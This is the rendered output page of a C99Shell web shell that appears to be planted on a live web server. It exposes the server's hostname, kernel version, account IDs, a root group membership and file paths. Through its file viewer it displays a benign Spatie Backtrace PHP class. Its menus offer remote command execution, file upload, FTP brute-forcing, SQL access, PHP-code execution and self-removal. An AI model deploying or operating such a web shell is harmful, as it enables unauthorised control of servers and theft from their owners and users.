!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/picomail.picotech.app/public_html/vendor/spatie/backtrace/src/   drwxr-xr-x
Free 28.91 GB of 117.98 GB (24.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Frame.php (1.36 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Spatie\Backtrace;

class 
Frame
{
    
/** @var string */
    
public $file;

    
/** @var int */
    
public $lineNumber;

    
/** @var array|null */
    
public $arguments null;

    
/** @var bool */
    
public $applicationFrame;

    
/** @var string|null */
    
public $method;

    
/** @var string|null */
    
public $class;

    public function 
__construct(
        
string $file,
        
int $lineNumber,
        ?array 
$arguments,
        
string $method null,
        
string $class null,
        
bool $isApplicationFrame false
    
) {
        
$this->file $file;

        
$this->lineNumber $lineNumber;

        
$this->arguments $arguments;

        
$this->method $method;

        
$this->class $class;

        
$this->applicationFrame $isApplicationFrame;
    }

    public function 
getSnippet(int $lineCount): array
    {
        return (new 
CodeSnippet())
            ->
surroundingLine($this->lineNumber)
            ->
snippetLineCount($lineCount)
            ->
get($this->file);
    }

    public function 
getSnippetProperties(int $lineCount): array
    {
        
$snippet $this->getSnippet($lineCount);

        return 
array_map(function (int $lineNumber) use ($snippet) {
            return [
                
'line_number' => $lineNumber,
                
'text' => $snippet[$lineNumber],
            ];
        }, 
array_keys($snippet));
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--